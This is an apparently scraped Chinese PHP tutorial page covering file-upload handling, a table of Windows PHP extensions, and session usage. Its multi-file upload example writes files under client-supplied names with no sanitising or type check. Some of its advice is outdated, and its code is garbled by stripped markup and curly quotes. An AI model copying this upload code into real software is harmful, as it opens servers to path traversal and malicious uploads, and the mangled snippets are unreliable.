請查閱函數 is_uploaded_file() 和 move_uploaded_file() 以獲取進一步的信息。以下範例處理由表單提供的文件上傳。 

?php

// In PHP versions earlier than 4.1.0, $HTTP_POST_FILES should be used instead

// of $_FILES.

$uploaddir = ‘/var/www/uploads/’;

$uploadfile = $uploaddir . basename($_FILES[‘userfile’][‘name’]);

echo ‘pre’;

if (move_uploaded_file($_FILES[‘userfile’][‘tmp_name’], $uploadfile)) {

    echo “File is valid, and was successfully uploaded.\n”;

} else {

    echo “Possible file upload attack!\n”;

}

echo ‘Here is some more debugging info:’;

print_r($_FILES);

print “/pre”;

接受上傳文件的 PHP 腳本為了決定接下來要對該文件進行哪些操作,應該實現任何邏輯上必要的檢查。例如可以用 $_FILES[‘userfile’][‘size’] 變量來排除過大或過小的文件,也可以通過 $_FILES[‘userfile’][‘type’] 變量來排除文件類型和某種標準不相符合的文件,但只把這個當作一系列檢查中的第一步,因為此值完全由客戶端控制而在 PHP 端並不檢查。自 PHP 4.2.0 起,還可以通過 $_FILES[‘userfile’][‘error’] 變量來根據不同的錯誤代碼來計划下一步如何處理。不管怎樣,要麼將該文件從臨時目錄中刪除,要麼將其移動到其它的地方。 

如果表單中沒有選擇上傳的文件,則 PHP 變量 $_FILES[‘userfile’][‘size’] 的值將為 0,$_FILES[‘userfile’][‘tmp_name’] 將為空。 

如果該文件沒有被移動到其它地方也沒有被改名,則該文件將在表單請求結束時被刪除。 

例 39.3. 上傳一組文件

PHP 的 HTML 數組特性甚至支持文件類型。 

form action=”” method=”post” enctype=”multipart/form-data”

pPictures:

input type=”file” name=”pictures[]” /

input type=”file” name=”pictures[]” /

input type=”file” name=”pictures[]” /

input type=”submit” value=”Send” /

/p

/form

   

?php

foreach ($_FILES[“pictures”][“error”] as $key = $error) {

    if ($error == UPLOAD_ERR_OK) {

        $tmp_name = $_FILES[“pictures”][“tmp_name”][$key];

        $name = $_FILES[“pictures”][“name”][$key];

        move_uploaded_file($tmp_name, “data/$name”);

    }

}

——————————————————————————–

上一頁  上一級 下一頁 

38. 處理 XForms  起始頁 錯誤信息說明 

在服務器配置PHP的時候需要開通幾個擴展,請問這幾個擴展對我的網站有何用?

百度不誤導你 ,我也是百度的,擴展全開都行,不妨礙你用就是了,幹嘛非要這麼細緻的分析每個擴展的作用呢?給你一份快餐,要麼你吃了,要麼你不吃。你會分析其他的情況嗎?

擴展庫 說明 註解

php_bz2.dll bzip2 壓縮函數庫 無

php_calendar.dll 曆法轉換函數庫 自 PHP 4.0.3 起內置

php_cpdf.dll ClibPDF 函數庫 無

php_crack.dll 密碼破解函數庫 無

php_ctype.dll ctype 家族函數庫 自 PHP 4.3.0 起內置

php_curl.dll CURL,客戶端 URL 庫函數庫 需要:libeay32.dll,ssleay32.dll(已附帶)

php_cybercash.dll 網絡現金支付函數庫 PHP = 4.2.0

php_db.dll DBM 函數庫 已廢棄。用 DBA 替代之(php_dba.dll)

php_dba.dll DBA:數據庫(dbm 風格)抽象層函數庫 無

php_dbase.dll dBase 函數庫 無

php_dbx.dll dbx 函數庫

php_domxml.dll DOM XML 函數庫 PHP = 4.2.0 需要:libxml2.dll(已附帶),PHP = 4.3.0 需要:iconv.dll(已附帶)

php_dotnet.dll .NET 函數庫 PHP = 4.1.1

php_exif.dll EXIF 函數庫 需要 php_mbstring.dll。並且在 php.ini 中,php_exif.dll 必須在 php_mbstring.dll之後加載。

php_fbsql.dll FrontBase 函數庫 PHP = 4.2.0

php_fdf.dll FDF:表單數據格式化函數庫 需要:fdftk.dll(已附帶)

php_filepro.dll filePro 函數庫 只讀訪問

php_ FTP 函數庫 自 PHP 4.0.3 起內置

php_gd.dll GD 庫圖像函數庫 在 PHP 4.3.2 中刪除。此外注意在 GD1 中不能用真彩色函數,用 php_gd2.dll 替代。

php_gd2.dll GD 庫圖像函數庫 GD2

php_gettext.dll Gettext 函數庫 PHP = 4.2.0 需要 gnu_gettext.dll(已附帶),PHP = 4.2.3 需要 libintl-1.dll,iconv.dll(已附帶)。

php_hyperwave.dll HyperWave 函數庫 無

php_iconv.dll ICONV 字符集轉換 需要:iconv-1.3.dll(已附帶),PHP =4.2.1 需要 iconv.dll

php_ifx.dll Informix 函數庫 需要:Informix 庫

php_iisfunc.dll IIS 管理函數庫 無

php_imap.dll IMAP,POP3 和 NNTP 函數庫 無

php_ingres.dll Ingres II 函數庫 需要:Ingres II 庫

php_interbase.dll InterBase functions 需要:gds32.dll(已附帶)

php_java.dll Java 函數庫 PHP = 4.0.6 需要:jvm.dll(已附帶)

php_ldap.dll LDAP 函數庫 PHP = 4.2.0 需要 libsasl.dll(已附帶),PHP = 4.3.0 需要 libeay32.dll,ssleay32.dll(已附帶)

php_mbstring.dll 多位元組字符串函數庫 無

php_mcrypt.dll Mcrypt 加密函數庫 需要:libmcrypt.dll

php_mhash.dll Mhash 函數庫 PHP = 4.3.0 需要:libmhash.dll(已附帶)

php_mime_magic.dll Mimetype 函數庫 需要:magic.mime(已附帶)

php_ming.dll Ming 函數庫(Flash) 無

php_msql.dll mSQL 函數庫 需要:msql.dll(已附帶)

php_mssql.dll MSSQL 函數庫 需要:ntwdblib.dll(已附帶)

php_mysql.dll MySQL 函數庫 PHP = 5.0.0 需要 libmysql.dll(已附帶)

php_mysqli.dll MySQLi 函數庫 PHP = 5.0.0 需要 libmysql.dll(PHP = 5.0.2 中是 libmysqli.dll)(已附帶)

php_oci8.dll Oracle 8 函數庫 需要:Oracle 8.1+ 客戶端庫

php_openssl.dll OpenSSL 函數庫 需要:libeay32.dll(已附帶)

php_oracle.dll Oracle 函數庫 需要:Oracle 7 客戶端庫

php_overload.dll 對象重載函數庫 自 PHP 4.3.0 起內置

php_pdf.dll PDF 函數庫 無

php_pgsql.dll PostgreSQL 函數庫 無

php_printer.dll 打印機函數庫 無

php_shmop.dll 共享內存函數庫 無

php_snmp.dll SNMP 函數庫 僅用於 Windows NT!

php_soap.dll SOAP 函數庫 PHP = 5.0.0

php_sockets.dll Socket 函數庫 無

php_sybase_ct.dll Sybase 函數庫 需要:Sybase 客戶端庫

php_tidy.dll Tidy 函數庫 PHP = 5.0.0

php_tokenizer.dll Tokenizer 函數庫 自 PHP 4.3.0 起內置

php_w32api.dll W32api 函數庫 無

php_xmlrpc.dll XML-RPC 函數庫 PHP = 4.2.1 需要 iconv.dll(已附帶)

php_xslt.dll XSLT 函數庫 PHP = 4.2.0 需要 sablot.dll,expat.dll(已附帶)。PHP = 4.2.1 需要 sablot.dll,expat.dll,iconv.dll(已附帶)。

php_yaz.dll YAZ 函數庫 需要:yaz.dll(已附帶)

php_zip.dll Zip 文件函數庫 只讀訪問

php_zlib.dll ZLib 壓縮函數庫 自 PHP 4.3.0 起內置

怎麼在PHP的管理頁面中插入session來禁止直接進入啊?

如何使用session

凡是與session有關的,之前必須調用函數session_start();

為session付值很簡單,如:

CODE:[Copy to clipboard]?php

Session_start();

$Name = “這是一個Session例子”;

Session_Register(“Name”);//注意,不要寫成:Session_Register(“[color=red]$Name[/color]”);

Echo $_SESSION[“Name”];

//之後$_SESSION[“Name”]為”這是一個Session例子”

?

在php4.2之後,可以為session直接付值:

CODE:[Copy to clipboard]?PHP

Session_Start();

$_SESSION[“name”]=”value”;

?

取消session可以這樣:

CODE:[Copy to clipboard]?php

session_start();

session_unset();

session_destroy();

?

取消某個session變量在php4.2以上還有BUG.

注意:

1:在調用Session_Start()之前不能有任何輸出.例如下面是錯誤的.

==========================================

1行

2行 ?PHP

3行 Session_Start();//之前在第一行已經有輸出

4行 …..

5行 ?

==========================================

提示1:

凡是出現”……..headers already sent……….”,就是Session_Start()之前向瀏覽器輸出信息.

去掉輸出就正常,(COOKIE也會出現這種錯誤,錯誤原因一樣)

提示2:

如果你的Session_Start()放在循環語句里,並且很難確定之前哪裡向瀏覽器輸出信息,可以用下面這種方法:

1行 ?PHP Ob_Start(); ?

……..這裡是你的程序……

2:這是什麼錯誤

Warning: session_start(): open(/tmp\sess_7d190aa36b4c5ec13a5c1649cc2da23f, O_RDWR) failed:….

因為你沒有指定session文件的存放路徑.

解決方法:

(1)在c盤建立文件夾tmp

(2)打開php.ini,找到session.save_path,修改為session.save_path= “c:/tmp”

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/245366.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-12 13:08
下一篇 2024-12-12 13:08

相關推薦

  • Python列表中負數的個數

    Python列表是一個有序的集合,可以存儲多個不同類型的元素。而負數是指小於0的整數。在Python列表中,我們想要找到負數的個數,可以通過以下幾個方面進行實現。 一、使用循環遍歷…

    編程 2025-04-29
  • Idea新建文件夾沒有java class的解決方法

    如果你在Idea中新建了一個文件夾,卻沒有Java Class,應該如何解決呢?下面從多個方面來進行解答。 一、檢查Idea設置 首先,我們應該檢查Idea的設置是否正確。打開Id…

    編程 2025-04-29
  • Python周杰倫代碼用法介紹

    本文將從多個方面對Python周杰倫代碼進行詳細的闡述。 一、代碼介紹 from urllib.request import urlopen from bs4 import Bea…

    編程 2025-04-29
  • 金額選擇性序列化

    本文將從多個方面對金額選擇性序列化進行詳細闡述,包括其定義、使用場景、實現方法等。 一、定義 金額選擇性序列化指根據傳入的金額值,選擇是否進行序列化,以達到減少數據傳輸的目的。在實…

    編程 2025-04-29
  • java client.getacsresponse 編譯報錯解決方法

    java client.getacsresponse 編譯報錯是Java編程過程中常見的錯誤,常見的原因是代碼的語法錯誤、類庫依賴問題和編譯環境的配置問題。下面將從多個方面進行分析…

    編程 2025-04-29
  • Python中引入上一級目錄中函數

    Python中經常需要調用其他文件夾中的模塊或函數,其中一個常見的操作是引入上一級目錄中的函數。在此,我們將從多個角度詳細解釋如何在Python中引入上一級目錄的函數。 一、加入環…

    編程 2025-04-29
  • 英語年齡用連字符號(Hyphenation for English Age)

    英語年齡通常使用連字符號表示,比如 “five-year-old boy”。本文將從多個方面探討英語年齡的連字符使用問題。 一、英語年齡的表達方式 英語中表…

    編程 2025-04-29
  • Java JsonPath 效率優化指南

    本篇文章將深入探討Java JsonPath的效率問題,並提供一些優化方案。 一、JsonPath 簡介 JsonPath是一個可用於從JSON數據中獲取信息的庫。它提供了一種DS…

    編程 2025-04-29
  • at least one option must be selected

    問題解答:當我們需要用戶在一系列選項中選擇至少一項時,我們需要對用戶進行限制,即「at least one option must be selected」(至少選擇一項)。 一、…

    編程 2025-04-29
  • Python官網中文版:解決你的編程問題

    Python是一種高級編程語言,它可以用於Web開發、科學計算、人工智能等領域。Python官網中文版提供了全面的資源和教程,可以幫助你入門學習和進一步提高編程技能。 一、Pyth…

    編程 2025-04-29

發表回復

登錄後才能評論